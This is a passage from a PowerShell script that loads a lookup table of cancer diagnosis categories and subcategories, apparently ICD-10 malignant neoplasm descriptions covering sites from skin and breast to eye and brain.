skin") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasm of overlapping sites of skin","Squamous cell carcinoma of overlapping sites of skin") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasm of overlapping sites of skin","Other specified malignant neoplasm of overlapping sites of skin") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasm of skin, unspecified","Unspecified malignant neoplasm of skin, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasm of skin, unspecified","Basal cell carcinoma of skin, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasm of skin, unspecified","Squamous cell carcinoma of skin, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasm of skin, unspecified","Other specified malignant neoplasm of skin, unspecified") + $null = $DiagnosisList.Rows.Add("Mesothelioma","Mesothelioma of pleura") + $null = $DiagnosisList.Rows.Add("Mesothelioma","Mesothelioma of peritoneum") + $null = $DiagnosisList.Rows.Add("Mesothelioma","Mesothelioma of pericardium") + $null = $DiagnosisList.Rows.Add("Mesothelioma","Mesothelioma of other sites") + $null = $DiagnosisList.Rows.Add("Mesothelioma","Mesothelioma, unspecified") + $null = $DiagnosisList.Rows.Add("Kaposi's sarcoma","Kaposi's sarcoma of skin") + $null = $DiagnosisList.Rows.Add("Kaposi's sarcoma","Kaposi's sarcoma of soft tissue") + $null = $DiagnosisList.Rows.Add("Kaposi's sarcoma","Kaposi's sarcoma of palate") + $null = $DiagnosisList.Rows.Add("Kaposi's sarcoma","Kaposi's sarcoma of lymph nodes") + $null = $DiagnosisList.Rows.Add("Kaposi's sarcoma","Kaposi's sarcoma of gastrointestinal sites") + $null = $DiagnosisList.Rows.Add("Kaposi's sarcoma of lung","Kaposi's sarcoma of unspecified lung") + $null = $DiagnosisList.Rows.Add("Kaposi's sarcoma of lung","Kaposi's sarcoma of right lung") + $null = $DiagnosisList.Rows.Add("Kaposi's sarcoma of lung","Kaposi's sarcoma of left lung") + $null = $DiagnosisList.Rows.Add("Kaposi's sarcoma of other sites","Kaposi's sarcoma of other sites") + $null = $DiagnosisList.Rows.Add("Kaposi's sarcoma, unspecified","Kaposi's sarcoma, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of peripheral nerves and autonomic nervous system","Malignant neoplasm of peripheral nerves of head, face and neck") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of peripheral nerves of upper limb, including shoulder","Malignant neoplasm of peripheral nerves of unspecified upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of peripheral nerves of upper limb, including shoulder","Malignant neoplasm of peripheral nerves of right upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of peripheral nerves of upper limb, including shoulder","Malignant neoplasm of peripheral nerves of left upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of peripheral nerves of lower limb, including hip","Malignant neoplasm of peripheral nerves of unspecified lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of peripheral nerves of lower limb, including hip","Malignant neoplasm of peripheral nerves of right lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of peripheral nerves of lower limb, including hip","Malignant neoplasm of peripheral nerves of left lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of peripheral nerves of thorax","Malignant neoplasm of peripheral nerves of thorax") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of peripheral nerves of abdomen","Malignant neoplasm of peripheral nerves of abdomen") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of peripheral nerves of pelvis","Malignant neoplasm of peripheral nerves of pelvis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of peripheral nerves of trunk, unspecified","Malignant neoplasm of peripheral nerves of trunk, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of peripheral nerves and autonomic nervous system","Malignant neoplasm of overlapping sites of peripheral nerves and autonomic nervous system") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of peripheral nerves and autonomic nervous system, unspecified","Malignant neoplasm of peripheral nerves and autonomic nervous system, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of retroperitoneum and peritoneum","Malignant neoplasm of retroperitoneum") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of retroperitoneum and peritoneum","Malignant neoplasm of specified parts of peritoneum") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of retroperitoneum and peritoneum","Malignant neoplasm of peritoneum, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of retroperitoneum and peritoneum","Malignant neoplasm of overlapping sites of retroperitoneum and peritoneum") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other connective and soft tissue","Malignant neoplasm of connective and soft tissue of head, face and neck") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of connective and soft tissue of upper limb, including shoulder","Malignant neoplasm of connective and soft tissue of unspecified upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of connective and soft tissue of upper limb, including shoulder","Malignant neoplasm of connective and soft tissue of right upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of connective and soft tissue of upper limb, including shoulder","Malignant neoplasm of connective and soft tissue of left upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of connective and soft tissue of lower limb, including hip","Malignant neoplasm of connective and soft tissue of unspecified lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of connective and soft tissue of lower limb, including hip","Malignant neoplasm of connective and soft tissue of right lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of connective and soft tissue of lower limb, including hip","Malignant neoplasm of connective and soft tissue of left lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of connective and soft tissue of thorax","Malignant neoplasm of connective and soft tissue of thorax") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of connective and soft tissue of abdomen","Malignant neoplasm of connective and soft tissue of abdomen") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of connective and soft tissue of pelvis","Malignant neoplasm of connective and soft tissue of pelvis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of connective and soft tissue of trunk, unspecified","Malignant neoplasm of connective and soft tissue of trunk, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of connective and soft tissue","Malignant neoplasm of overlapping sites of connective and soft tissue") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of connective and soft tissue, unspecified","Malignant neoplasm of connective and soft tissue, unspecified") + $null = $DiagnosisList.Rows.Add("Gastrointestinal stromal tumor","Gastrointestinal stromal tumor, unspecified site") + $null = $DiagnosisList.Rows.Add("Gastrointestinal stromal tumor","Gastrointestinal stromal tumor of esophagus") + $null = $DiagnosisList.Rows.Add("Gastrointestinal stromal tumor","Gastrointestinal stromal tumor of stomach") + $null = $DiagnosisList.Rows.Add("Gastrointestinal stromal tumor","Gastrointestinal stromal tumor of small intestine") + $null = $DiagnosisList.Rows.Add("Gastrointestinal stromal tumor","Gastrointestinal stromal tumor of large intestine") + $null = $DiagnosisList.Rows.Add("Gastrointestinal stromal tumor","Gastrointestinal stromal tumor of rectum") + $null = $DiagnosisList.Rows.Add("Gastrointestinal stromal tumor","Gastrointestinal stromal tumor of other sites") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of nipple and areola, female","Malignant neoplasm of nipple and areola, right female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of nipple and areola, female","Malignant neoplasm of nipple and areola, left female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of nipple and areola, female","Malignant neoplasm of nipple and areola, unspecified female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of nipple and areola, male","Malignant neoplasm of nipple and areola, right male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of nipple and areola, male","Malignant neoplasm of nipple and areola, left male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of nipple and areola, male","Malignant neoplasm of nipple and areola, unspecified male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of central portion of breast, female","Malignant neoplasm of central portion of right female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of central portion of breast, female","Malignant neoplasm of central portion of left female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of central portion of breast, female","Malignant neoplasm of central portion of unspecified female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of central portion of breast, male","Malignant neoplasm of central portion of right male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of central portion of breast, male","Malignant neoplasm of central portion of left male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of central portion of breast, male","Malignant neoplasm of central portion of unspecified male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper-inner quadrant of breast, female","Malignant neoplasm of upper-inner quadrant of right female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper-inner quadrant of breast, female","Malignant neoplasm of upper-inner quadrant of left female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper-inner quadrant of breast, female","Malignant neoplasm of upper-inner quadrant of unspecified female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper-inner quadrant of breast, male","Malignant neoplasm of upper-inner quadrant of right male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper-inner quadrant of breast, male","Malignant neoplasm of upper-inner quadrant of left male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper-inner quadrant of breast, male","Malignant neoplasm of upper-inner quadrant of unspecified male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower-inner quadrant of breast, female","Malignant neoplasm of lower-inner quadrant of right female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower-inner quadrant of breast, female","Malignant neoplasm of lower-inner quadrant of left female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower-inner quadrant of breast, female","Malignant neoplasm of lower-inner quadrant of unspecified female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower-inner quadrant of breast, male","Malignant neoplasm of lower-inner quadrant of right male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower-inner quadrant of breast, male","Malignant neoplasm of lower-inner quadrant of left male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower-inner quadrant of breast, male","Malignant neoplasm of lower-inner quadrant of unspecified male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper-outer quadrant of breast, female","Malignant neoplasm of upper-outer quadrant of right female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper-outer quadrant of breast, female","Malignant neoplasm of upper-outer quadrant of left female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper-outer quadrant of breast, female","Malignant neoplasm of upper-outer quadrant of unspecified female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper-outer quadrant of breast, male","Malignant neoplasm of upper-outer quadrant of right male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper-outer quadrant of breast, male","Malignant neoplasm of upper-outer quadrant of left male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of upper-outer quadrant of breast, male","Malignant neoplasm of upper-outer quadrant of unspecified male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower-outer quadrant of breast, female","Malignant neoplasm of lower-outer quadrant of right female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower-outer quadrant of breast, female","Malignant neoplasm of lower-outer quadrant of left female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower-outer quadrant of breast, female","Malignant neoplasm of lower-outer quadrant of unspecified female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower-outer quadrant of breast, male","Malignant neoplasm of lower-outer quadrant of right male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower-outer quadrant of breast, male","Malignant neoplasm of lower-outer quadrant of left male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lower-outer quadrant of breast, male","Malignant neoplasm of lower-outer quadrant of unspecified male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of axillary tail of breast, female","Malignant neoplasm of axillary tail of right female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of axillary tail of breast, female","Malignant neoplasm of axillary tail of left female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of axillary tail of breast, female","Malignant neoplasm of axillary tail of unspecified female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of axillary tail of breast, male","Malignant neoplasm of axillary tail of right male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of axillary tail of breast, male","Malignant neoplasm of axillary tail of left male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of axillary tail of breast, male","Malignant neoplasm of axillary tail of unspecified male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of breast, female","Malignant neoplasm of overlapping sites of right female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of breast, female","Malignant neoplasm of overlapping sites of left female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of breast, female","Malignant neoplasm of overlapping sites of unspecified female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of breast, male","Malignant neoplasm of overlapping sites of right male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of breast, male","Malignant neoplasm of overlapping sites of left male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of breast, male","Malignant neoplasm of overlapping sites of unspecified male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of breast of unspecified site, female","Malignant neoplasm of unspecified site of right female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of breast of unspecified site, female","Malignant neoplasm of unspecified site of left female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of breast of unspecified site, female","Malignant neoplasm of unspecified site of unspecified female breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of breast of unspecified site, male","Malignant neoplasm of unspecified site of right male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of breast of unspecified site, male","Malignant neoplasm of unspecified site of left male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of breast of unspecified site, male","Malignant neoplasm of unspecified site of unspecified male breast") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of vulva","Malignant neoplasm of labium majus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of vulva","Malignant neoplasm of labium minus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of vulva","Malignant neoplasm of clitoris") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of vulva","Malignant neoplasm of overlapping sites of vulva") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of vulva","Malignant neoplasm of vulva, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of vagina","Malignant neoplasm of vagina") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of cervix uteri","Malignant neoplasm of endocervix") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of cervix uteri","Malignant neoplasm of exocervix") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of cervix uteri","Malignant neoplasm of overlapping sites of cervix uteri") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of cervix uteri","Malignant neoplasm of cervix uteri, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of corpus uteri","Malignant neoplasm of isthmus uteri") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of corpus uteri","Malignant neoplasm of endometrium") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of corpus uteri","Malignant neoplasm of myometrium") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of corpus uteri","Malignant neoplasm of fundus uteri") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of corpus uteri","Malignant neoplasm of overlapping sites of corpus uteri") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of corpus uteri","Malignant neoplasm of corpus uteri, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of uterus, part unspecified","Malignant neoplasm of uterus, part unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of ovary","Malignant neoplasm of right ovary") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of ovary","Malignant neoplasm of left ovary") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of ovary","Malignant neoplasm of unspecified ovary") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of fallopian tube","Malignant neoplasm of unspecified fallopian tube") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of fallopian tube","Malignant neoplasm of right fallopian tube") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of fallopian tube","Malignant neoplasm of left fallopian tube") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of broad ligament","Malignant neoplasm of unspecified broad ligament") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of broad ligament","Malignant neoplasm of right broad ligament") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of broad ligament","Malignant neoplasm of left broad ligament") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of round ligament","Malignant neoplasm of unspecified round ligament") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of round ligament","Malignant neoplasm of right round ligament") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of round ligament","Malignant neoplasm of left round ligament") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of parametrium","Malignant neoplasm of parametrium") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of uterine adnexa, unspecified","Malignant neoplasm of uterine adnexa, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other specified female genital organs","Malignant neoplasm of other specified female genital organs") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of female genital organs","Malignant neoplasm of overlapping sites of female genital organs") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of female genital organ, unspecified","Malignant neoplasm of female genital organ, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of placenta","Malignant neoplasm of placenta") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of penis","Malignant neoplasm of prepuce") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of penis","Malignant neoplasm of glans penis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of penis","Malignant neoplasm of body of penis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of penis","Malignant neoplasm of overlapping sites of penis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of penis","Malignant neoplasm of penis, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of prostate","Malignant neoplasm of prostate") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of undescended testis","Malignant neoplasm of unspecified undescended testis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of undescended testis","Malignant neoplasm of undescended right testis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of undescended testis","Malignant neoplasm of undescended left testis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of descended testis","Malignant neoplasm of unspecified descended testis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of descended testis","Malignant neoplasm of descended right testis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of descended testis","Malignant neoplasm of descended left testis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of testis, unspecified whether descended or undescended","Malignant neoplasm of unspecified testis, unspecified whether descended or undescended") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of testis, unspecified whether descended or undescended","Malignant neoplasm of right testis, unspecified whether descended or undescended") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of testis, unspecified whether descended or undescended","Malignant neoplasm of left testis, unspecified whether descended or undescended") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of epididymis","Malignant neoplasm of unspecified epididymis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of epididymis","Malignant neoplasm of right epididymis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of epididymis","Malignant neoplasm of left epididymis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of spermatic cord","Malignant neoplasm of unspecified spermatic cord") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of spermatic cord","Malignant neoplasm of right spermatic cord") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of spermatic cord","Malignant neoplasm of left spermatic cord") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of scrotum","Malignant neoplasm of scrotum") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other specified male genital organs","Malignant neoplasm of other specified male genital organs") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of male genital organs","Malignant neoplasm of overlapping sites of male genital organs") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of male genital organ, unspecified","Malignant neoplasm of male genital organ, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of kidney, except renal pelvis","Malignant neoplasm of right kidney, except renal pelvis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of kidney, except renal pelvis","Malignant neoplasm of left kidney, except renal pelvis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of kidney, except renal pelvis","Malignant neoplasm of unspecified kidney, except renal pelvis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of renal pelvis","Malignant neoplasm of right renal pelvis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of renal pelvis","Malignant neoplasm of left renal pelvis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of renal pelvis","Malignant neoplasm of unspecified renal pelvis") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of ureter","Malignant neoplasm of right ureter") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of ureter","Malignant neoplasm of left ureter") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of ureter","Malignant neoplasm of unspecified ureter") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of bladder","Malignant neoplasm of trigone of bladder") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of bladder","Malignant neoplasm of dome of bladder") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of bladder","Malignant neoplasm of lateral wall of bladder") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of bladder","Malignant neoplasm of anterior wall of bladder") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of bladder","Malignant neoplasm of posterior wall of bladder") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of bladder","Malignant neoplasm of bladder neck") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of bladder","Malignant neoplasm of ureteric orifice") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of bladder","Malignant neoplasm of urachus") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of bladder","Malignant neoplasm of overlapping sites of bladder") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of bladder","Malignant neoplasm of bladder, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified urinary organs","Malignant neoplasm of urethra") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified urinary organs","Malignant neoplasm of paraurethral glands") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified urinary organs","Malignant neoplasm of overlapping sites of urinary organs") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified urinary organs","Malignant neoplasm of urinary organ, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of conjunctiva","Malignant neoplasm of unspecified conjunctiva") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of conjunctiva","Malignant neoplasm of right conjunctiva") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of conjunctiva","Malignant neoplasm of left conjunctiva") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of cornea","Malignant neoplasm of unspecified cornea") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of cornea","Malignant neoplasm of right cornea") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of cornea","Malignant neoplasm of left cornea") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of retina","Malignant neoplasm of unspecified retina") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of retina","Malignant neoplasm of right retina") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of retina","Malignant neoplasm of left retina") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of choroid","Malignant neoplasm of unspecified choroid") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of choroid","Malignant neoplasm of right choroid") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of choroid","Malignant neoplasm of left choroid") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of ciliary body","Malignant neoplasm of unspecified ciliary body") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of ciliary body","Malignant neoplasm of right ciliary body") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of ciliary body","Malignant neoplasm of left ciliary body") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lacrimal gland and duct","Malignant neoplasm of unspecified lacrimal gland and duct") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lacrimal gland and duct","Malignant neoplasm of right lacrimal gland and duct") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lacrimal gland and duct","Malignant neoplasm of left lacrimal gland and duct") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of orbit","Malignant neoplasm of unspecified orbit") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of orbit","Malignant neoplasm of right orbit") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of orbit","Malignant neoplasm of left orbit") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of eye and adnexa","Malignant neoplasm of overlapping sites of unspecified eye and adnexa") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of eye and adnexa","Malignant neoplasm of overlapping sites of right eye and adnexa") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of overlapping sites of eye and adnexa","Malignant neoplasm of overlapping sites of left eye and adnexa") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of unspecified site of eye","Malignant neoplasm of unspecified site of unspecified eye") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of unspecified site of eye","Malignant neoplasm of unspecified site of right eye") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of unspecified site of eye","Malignant neoplasm of unspecified site of left eye") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of meninges","Malignant neoplasm of cerebral meninges") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of meninges","Malignant neoplasm of spinal meninges") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of meninges","Malignant neoplasm of meninges, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of brain","Malignant neoplasm of cerebrum, except lobes and ventricles") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of brain","Malignant neoplasm of frontal lobe") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of brain","Malignant neoplasm of temporal lobe") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of brain","Malignant neoplasm of parietal lobe") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of brain","Malignant neoplasm of occipital lobe") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of brain","Malignant neoplasm of cerebral ventricle") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of brain","Malignant neoplasm of cerebellum") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of brain","Malignant neoplasm of brain stem") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of brain","Malignant neoplasm of overlapping sites of brain") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of brain","Malignant neoplasm of brain, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of spinal cord, cranial nerves and other parts of central nervous system","Malignant neoplasm of spinal cord") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of spinal cord, cranial nerves and other parts of central nervous system","Malignant neoplasm of cauda equina") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of olfactory nerve","Malignant neoplasm of unspecified olfactory nerve") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of olfactory nerve","Malignant neoplasm of right olfactory nerve") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of olfactory nerve","Malignant neoplasm of left olfactory nerve") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of optic nerve","Malignant neoplasm of unspecified optic nerve") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of optic nerve","Malignant neoplasm of right optic nerve") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of optic nerve","Malignant neoplasm of left optic nerve") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of acoustic nerve","Malignant neoplasm of unspecified acoustic nerve") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of acoustic nerve","Malignant neoplasm of right acoustic nerve") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of acoustic nerve","Malignant neoplasm of left acoustic nerve") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified cranial nerves","Malignant neoplasm of unspecified cranial nerve") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of other and unspecified cranial nerves","Malignant neoplasm of other cranial nerves") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of central nervous system, unspecified","Malignant neoplasm of central nervous system, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of thyroid gland","Malignant neoplasm of thyroid gland") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of cortex of adrenal gland","Malignant neoplasm of cortex of unspecified 